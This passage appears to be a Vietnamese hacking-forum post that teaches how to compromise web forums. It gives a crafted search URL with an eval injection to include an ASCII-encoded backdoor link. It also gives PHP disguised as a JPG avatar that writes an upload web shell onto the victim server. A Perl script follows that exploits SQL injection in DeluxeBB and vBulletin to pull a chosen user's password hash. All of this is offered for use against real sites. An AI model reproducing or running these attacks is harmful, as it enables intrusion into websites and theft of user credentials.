(122).CHR(47).CHR(117).CHR(112).CHR(108).CHR(111). CHR(97).CHR(100).CHR(115).CHR(47).CHR(97).CHR(118) .CHR(45).CHR(56).CHR(53).CHR(46).CHR(106).CHR(112) .CHR(103))); // Lưu ý : Các ASCII trên là link con backdoor của mình , chỗ này convert hơi mệt nhĩ POst song vào "SEARCH" rồi search với từ khóa : " langtuelval " nhưng nhớ phần "Search Options" chỗ "Result Type" chọn "Show results as posts" ! Search 1 phát nó open luôn topic mới nãy mình mới post , rồi nhìn lên address có dạng : thptbmt.biz/index.php?act=Search&CODE=show&searchid=377eb74395 7288d34ec63034d6b558a2&search_in=posts&result_type =posts&highlite=langtueval thêm vào đằng sau link : &lastdate=z|eval.*?%20//)%23e%00 thành : thptbmt.biz/index.php?act=Search&CODE=show&searchid=377eb74395 7288d34ec63034d6b558a2&search_in=posts&result_type =posts&highlite=langtueval&lastdate=z|eval.*?%20//)%23e%00 Khi run link này nó sẽ include tới link backdoor mà ta đã chuyển về dạng ASCII ở trên ! Thía là song Nhưng mình lại ko rành mí remv này ! híc ! Nên khi làm như cách trên mình ứh mần ăn được gì cả nên nghĩ ra cách khác chơi hihi ! Làm theo lời bác : IceShaman Lợi dụng chỗ up avatar ( nếu forum nào ko kĩ sẽ cho mem có quyền upload avatar lên ) ! UP 1 avatar mang tên langtu.JPG với nội dung thía lày : CODE <? $file=fopen("./uploads/upload.php",w); $content="<form enctype='multipart/form-data' action='upload.php' method='POST'>" ."<input type='hidden' name='MAX_FILE_SIZE' value='10000000' />Choose a file to upload: <input name='uploadedfile' type='file' />" ."<br /><input type='submit' value='Upload File' /></form>" ."<?if (!isset("."$"."HTTP_POST_VARS['MAX_FILE_SIZE'])) { die();}" ."$"."target_path = './'; "."$"."target_path = "."$"."target_path . basename( "."$"."_FILES['uploadedfile']['name']); " ."if(move_uploaded_file("."$"."_FILES['uploadedfile']['tmp_name'], "."$"."target_path)) { echo 'OK '; } " ."else{ echo 'There was an error uploading the file, please try again!'; }?>"; if (fwrite($file, $content) === FALSE) { echo "Cannot write to file "; exit; } echo "Success"; fclose($file); ?> Như đoạn code trên nó sẽ ghi ra 1 file upload.php với chức năng UPLOAD mà phải hem hihi ! Sau đó edit lại cái link ASCII thành cái link avatar mà mình mới up lên ( thường thì có dạng link.com/forum/uploads/av-xx.jpg ) tiếp : http://www.victim.com/forum/uploads/upload.php Up 1 con remv mới lên Sữ dụng OK Cách của lt chỉ mang tính chắc ăn thôi Vì mình làm cách trên kia ko được nên mới dài dòng như thía này ! Nếu dùng cách trên như tut video thì hy có thể thữ nó tại đây : để dịch link qua dạng ascii bạn vào : www.haylam.com/lhav/decoder.php nhét link remv dạng .jpg mà bạn mới up vào và nhất String > ASCII langtuhaohoa(HCE) Some Remote SQL Injection Exploit Trích: #!/usr/bin/perl use IO::Socket; print q{ ################################################## #### # DeluxeBB Remote SQL Injection Exploit # # vbulletin Remote SQL Injection Exploit # ################################################## #### }; if (!$ARGV[2]) { print q{ Usage: perl dbbxpl.pl host /directory/ victim_userid perl dbbxpl.pl www.somesite.com /forum/ 1 }; } $server = $ARGV[0]; $dir = $ARGV[1]; $user = $ARGV[2]; $myuser = $ARGV[3]; $mypass = $ARGV[4]; $myid = $ARGV[5]; print " \r\n"; print "[>] SERVER: $server\r\n"; print "[>] DIR: $dir\r\n"; print "[>] USERID: $user\r\n"; print " \r\n\r\n"; $server =~ s/(http:\/\/)//eg; $path = $dir; $path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ; print "[~] PREPARE TO CONNECT \r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; print "[+] CONNECTED\r\n"; print "[~] SENDING QUERY \r\n"; print $socket "GET $path HTTP/1.1\r\n"; print $socket "Host: $server\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\r\n"; print "[+] DONE!\r\n\r\n"; print " [ REPORT ] \r\n"; while ($answer = <$socket>) { if ($answer =~/(\w{32})/) { if ($1 ne 0) { print "Password Hash is: ".$1."\r\n"; print " \r\n"; } exit(); } } print " \r\n"; . $file=fopen("./uploads/upload.php",w); $content="<form enctype='multipart/form-data' action='upload.php' method='POST'>" ."<input